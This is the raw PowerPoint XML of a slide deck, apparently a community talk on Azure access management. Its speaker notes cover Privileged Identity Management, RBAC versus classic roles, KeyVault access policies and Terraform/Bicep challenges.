    <dgm:cxn modelId="{BB63D964-925B-44E3-A830-31D82BE53342}" type="presParOf" srcId="{98FDF43E-0D24-4B12-B8E2-3855C0BE5DCE}" destId="{A49BE54C-C489-41FC-B0D2-C3BAD0486691}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{217C6EEE-6044-49F3-AB01-49F19BD2FE02}" type="presParOf" srcId="{A12005A4-2BEF-4526-A5F1-438D6AE3ED54}" destId="{C69BC969-0A7D-4B2F-8B1F-22786BCD1EB7}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{9B9532E0-2AE3-411A-BF55-82A843A5F4E9}" type="presParOf" srcId="{A12005A4-2BEF-4526-A5F1-438D6AE3ED54}" destId="{9E80F26D-3E6B-4803-AD04-793A453C1521}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{97F90A8C-6FD3-4012-8FA3-F406BE1369E1}" type="presParOf" srcId="{9E80F26D-3E6B-4803-AD04-793A453C1521}" destId="{EE8780AC-C293-492D-84D0-AA9CFCFEF2C9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{62D8AA5E-83F6-4CA6-9A29-02D4C462EAD1}" type="presParOf" srcId="{9E80F26D-3E6B-4803-AD04-793A453C1521}" destId="{03CA19A4-A984-4673-8ECC-E91DC9E1F76E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{AEF98B19-A368-4199-B452-2013C5FAAF9B}" type="presParOf" srcId="{9E80F26D-3E6B-4803-AD04-793A453C1521}" destId="{2705D3C6-3FC7-415F-AE9E-3468C1D004A0}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{F444FD6B-1767-4B68-BDD4-40ACBFC1696A}" type="presParOf" srcId="{A12005A4-2BEF-4526-A5F1-438D6AE3ED54}" destId="{35D13C53-3DF1-45D5-A1A9-636CF0635780}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{BEE8967F-5D2F-4E9C-8BFD-335E6AFA4F05}" type="presParOf" srcId="{A12005A4-2BEF-4526-A5F1-438D6AE3ED54}" destId="{D7301A0E-99ED-4B08-A75D-A9069BA587B3}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{B0043C4B-C570-438E-87A8-DA5B4675D91F}" type="presParOf" srcId="{D7301A0E-99ED-4B08-A75D-A9069BA587B3}" destId="{8864A423-11A1-440E-8C4C-F8F5BB8D2D20}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{9A438340-1EF2-4D2E-B38B-325C2759ED2C}" type="presParOf" srcId="{D7301A0E-99ED-4B08-A75D-A9069BA587B3}" destId="{54184ACA-E0B1-4766-AA81-319C7E9C789D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{509E705C-57AA-4212-BF53-8F23E50B259E}" type="presParOf" srcId="{D7301A0E-99ED-4B08-A75D-A9069BA587B3}" destId="{916E310B-96CC-4261-8A04-C0E6AE5FC396}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{07CA334D-007B-4814-B833-D23E7CD3F148}" type="presParOf" srcId="{A12005A4-2BEF-4526-A5F1-438D6AE3ED54}" destId="{925C84EB-5B14-4DD5-AF1E-76193FB0388B}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{D9205BED-5B73-4C13-87F9-9D28726C3019}" type="presParOf" srcId="{A12005A4-2BEF-4526-A5F1-438D6AE3ED54}" destId="{EFC787B1-D02D-4923-BA55-61A5558A401F}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{4365AF74-2F21-460F-BB7C-A4B298142343}" type="presParOf" srcId="{EFC787B1-D02D-4923-BA55-61A5558A401F}" destId="{38F1A9C0-BA9B-4CB9-AEB9-6ED2315FB3D9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{9E03B5E7-EDFE-4933-8634-5727D2B54FED}" type="presParOf" srcId="{EFC787B1-D02D-4923-BA55-61A5558A401F}" destId="{FF49C45B-A01A-4286-AA5A-9AF6CB394297}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{82A3DD9B-4DEB-4FFD-B2D9-A316BC9B25AB}" type="presParOf" srcId="{EFC787B1-D02D-4923-BA55-61A5558A401F}" destId="{4D622E96-7547-4DCB-8B8D-76186CD73A6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7BC44-3D0E-4EF3-9B68-6AE2FFA89EF0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="434838" y="1018215"/>
          <a:ext cx="703212" cy="7032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868F6AE-444B-4C99-A6AC-BD5E4CCC91F5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5097" y="1955940"/>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0" i="0" kern="1200"/>
            <a:t>Have fun​</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5097" y="1955940"/>
        <a:ext cx="1562695" cy="625078"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2C72DE5B-4B80-4499-BCEF-AA16287C1D3E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2271005" y="1018215"/>
          <a:ext cx="703212" cy="7032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2F1E8C-98C7-42C9-9999-D68C7DD0D620}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1841264" y="1955940"/>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0" i="0" kern="1200"/>
            <a:t>Build network ​</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1841264" y="1955940"/>
        <a:ext cx="1562695" cy="625078"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{99290F20-EA8F-4983-A5DD-E67CBFBCB590}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4107172" y="1018215"/>
          <a:ext cx="703212" cy="7032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9BE54C-C489-41FC-B0D2-C3BAD0486691}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3677431" y="1955940"/>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0" i="0" kern="1200"/>
            <a:t>Share knowledge ​</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3677431" y="1955940"/>
        <a:ext cx="1562695" cy="625078"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EE8780AC-C293-492D-84D0-AA9CFCFEF2C9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5943339" y="1018215"/>
          <a:ext cx="703212" cy="7032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05D3C6-3FC7-415F-AE9E-3468C1D004A0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5513598" y="1955940"/>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0" i="0" kern="1200"/>
            <a:t>Learn from each other ​</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5513598" y="1955940"/>
        <a:ext cx="1562695" cy="625078"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8864A423-11A1-440E-8C4C-F8F5BB8D2D20}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7779506" y="1018215"/>
          <a:ext cx="703212" cy="70321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6E310B-96CC-4261-8A04-C0E6AE5FC396}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7349765" y="1955940"/>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0" i="0" kern="1200"/>
            <a:t>Giving power to the community​</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7349765" y="1955940"/>
        <a:ext cx="1562695" cy="625078"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{38F1A9C0-BA9B-4CB9-AEB9-6ED2315FB3D9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9615673" y="1018215"/>
          <a:ext cx="703212" cy="70321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622E96-7547-4DCB-8B8D-76186CD73A67}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9185932" y="1955940"/>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b="0" i="0" kern="1200"/>
            <a:t>Develop technology for a secure and sustainable future​</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9185932" y="1955940"/>
        <a:ext cx="1562695" cy="62507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DEA677C-EC25-4801-AFC2-6FB6A73EBD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D305392-6E5E-4A38-93F1-F70A9C32F24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883454-FB63-432A-A845-7554FCCD2BB8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/19/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ADAC692-6AA6-46D1-882C-5EC0AB8A4E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FF47CD5-9D0D-4D35-8A0B-984AA0849C1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978FA7-FBD7-4DA6-9AA3-9D0B9FA60BA7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8096054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ABC5E2-5DA3-4D7E-AB85-3A027AAEEE0E}" type="datetimeFigureOut">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>19.04.2022</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-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b-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b-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38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3573083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38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2333689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Elevated access </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Time restricted access to resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Reporting on who has access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ability to revoke</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2D38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="721027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 User admin isn’t the same as user access admin or groups administrator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example, KeyVault contributor role is management plane role does not allow access to keys, secrets and certs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>- Storage contributor isn’t the same as storage blob data contributor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Application admin role if dealing with service principals and managed identities </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Role admin for role administration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2D38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2068437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6E6E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>To better understand roles in Azure, it helps to know some of the history. When Azure was initially released, access to resources was managed with just three administrator roles: Account Administrator, Service Administrator, and Co-Administrator.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Later, Azure role-based access control (Azure RBAC) was added. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>- Classic roles cannot be added by PIM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>- Custom roles also possible in both</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E6E6E6"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2D38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3593060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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Admin unit – subdivision of organization to assign specific admins permissions to manage the unit. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, finance admins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2D38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2652568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latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>- Activate multiple role assignments in a single request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2D38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1185033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38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="423341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Access Policy:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Users, Groups, Service Principals, Applications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2D38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3427416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Multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>keyvaults</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> with differing policies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>IAC challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Remote state in terraform out of date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bicep overwriting existing access policies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Complex code </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2D38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2320507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Downtime on AD group sync, how to mitigate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>IAC – pipeline ordering to ensure no circular references</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Plan migration </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2D38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4361145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38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
